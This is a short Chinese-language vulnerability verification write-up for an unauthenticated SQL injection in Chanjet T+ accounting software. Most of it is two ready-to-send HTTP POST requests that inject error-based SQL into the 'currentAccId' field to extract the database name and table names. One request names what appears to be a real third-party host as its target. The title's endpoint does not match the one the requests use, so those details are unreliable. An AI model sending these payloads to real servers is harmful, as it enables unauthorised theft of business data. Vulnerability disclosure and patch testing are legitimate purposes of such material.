漏洞验证-畅捷通T+的/tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx接口存在SQL注入漏洞

一、漏洞描述

畅捷通T+的/tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx接口存在SQL注入漏洞，未经身份验证的攻击者可以利用SQL注入漏洞获取数据库中的信息。

二、验证POC

验证数据库名

POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
Accept: */*
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Content-Type: application/json
Content-Length: 139

{"currentAcc":"1","currentAccId":"2' and 1=convert(int,db_name())+'a--+","currentDsName":"1","currentVersion":"1","currentVersionNo":"1"}

验证表名

POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load HTTP/1.1
Host: dy.dahuaa.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
Accept: */*
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Content-Type: application/json
Content-Length: 240

{
  "currentAcc": "1",
  "currentAccId": "2' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_catalog='数据库名'))+'a",
  "currentDsName": "1",
  "currentVersion": "1",
  "currentVersionNo": "1"
}

三、验证截图

四、修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：https://www.chanjet.com/